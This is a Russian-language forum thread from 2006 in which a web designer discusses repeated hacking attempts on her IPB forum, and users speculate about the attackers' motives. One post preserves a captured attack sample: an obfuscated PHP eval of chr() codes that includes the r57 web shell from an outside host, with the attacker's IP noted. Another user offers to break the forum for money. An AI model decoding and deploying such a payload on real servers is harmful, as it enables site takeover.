Опубликовано: 3 мая 200619 г Уже несколько раз в день кто-то пытается тестить на моем форуме эксплойты. Они не работают, но приходится регулярно чистить форум.Мне интересна психология людей, пытающихся навредить форуму дизайнера, который к тому же, как никто другой, раздает много своих работ бесплатно.Собственно за что и почему? Мне хочется верить, что это происходит исключительно из-за глупости и неразвитости взломщиков.
Опубликовано: 15 мая 200619 г Уважаемая Fisana!Просто восхищаюсь вашим творчеством! Рекспект вам!Но боюсь что проблема взлома форумов была, будет и остается актуальной всегда...Мне кажется, что вам просто завидуют... ;)Скины у вас просто ЗАМЕЧАТЕЛЬНЫЕ... Лучшие, что я видел...Цена за них минимальна!Спасибо вам за ваше творчество! С уважением, Zorick
Опубликовано: 15 мая 200619 г Fisana, удивляет ваша уверенность. человек с прямыми руками уложит любой IPB что бы не писали официальные лица про закрытые дыры. если не верите готов за вознаграждение положить полностью ваш форум.
Опубликовано: 16 мая 200619 г Автор Zorick,Спасибо ;) Dimas,Меня удивляет Ваша готовность его взломать. Объяснять про дыры не нужно, они есть везде. Взломать можно что угодно при желании.Но зачем? Каковы мотивы?Лично я не верю, что разумный человек станет заниматься вредительством. А конкурентов хотелось бы иметь достойных, чтобы учиться у них и не расслабляться.
Опубликовано: 16 мая 200619 г конечно я не собираюсь заниматься вредительством да и не нужно это мне.
Опубликовано: 17 мая 200619 г Естественно, не нужно это глупым детям ;) вообще-то, не много я видел детей, знающих, скажем, что такое sql-инъекция :DНаверное, кто-то все же возжелал платных скинов... Во всяком случае, не думаю я, что кто-то решил потестить на банальные дыры в защите сайт дизайнера :D здесь не тот случай, когда "обидеть художника может каждый" :D
Опубликовано: 18 мая 200619 г Автор Сейчас вроде не нападают. С тех пор, как меня нет в администрации ИБР нападения стихли.Вероятно, просто кто-то по ссылкам в профилях на ибресурсе ходил хулиганить...
Опубликовано: 23 мая 200619 г eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); // IP кулхацкера: 193.108.129.122 Изменено 23 мая 200619 г пользователем Fisana
Опубликовано: 23 мая 200619 г Автор Ребят, однако достали уже.Даже банить надоело.. Пост перенесла сюда...Буду коллекцию собирать. Изменено 23 мая 200619 г пользователем Fisana
Опубликовано: 17 июня 200619 г Безнадёжные надежды, такая истинная черта людей. Они некогда не думают, что им можно ответить тем же.
Опубликовано: 24 июля 200619 г FisanaЕсли люди хотят добыть твои плтные скины, мой совет - держи форум и портфолио на одном сервере, а сами платные файлы на другом B) А то, что после твоего ухода из IBR, атаки поутихли означает, что раньше они хотели захватить твой аккаунт в надежде, что на Ай-Би-Ресурсе будет тот же пароль. Вывод - наивные. B)
Опубликовано: 7 августа 200619 г пардон за отфтоп, но здесь существуют ряд несколько причин, и точно , не кто не ответить на этот вопрос, почему пытаються ломать форумы? Есть кто из баловства, есть просто кто не равнодушен к индивудиму как fisana, есть просто ради ,.спортивного интреса.Суть втом что , если так патыються выразить свое превосходство , то это ,,реябчество ,, ломать нужно другое , например базу данных , или фсб.Слабо?Пардон за лирику. Но выражаюсвою точку зрения на сей счет, просто в сети всегда есть и вменяемые люди, так-же и много больных, с диагнозом ,, маврика,, B)(я проголосовал за конкуренцию, танеденция рынка рунета))
Опубликовано: 7 августа 200619 г Автор Надеюсь, что все-таки конкуренция ни при чем.Меня не было более полутора месяцев, на форум никто (вроде) не покушался.
Уже несколько раз в день кто-то пытается тестить на моем форуме эксплойты. Они не работают, но приходится регулярно чистить форум.
Мне интересна психология людей, пытающихся навредить форуму дизайнера, который к тому же, как никто другой, раздает много своих работ бесплатно.
Собственно за что и почему?
Мне хочется верить, что это происходит исключительно из-за глупости и неразвитости взломщиков.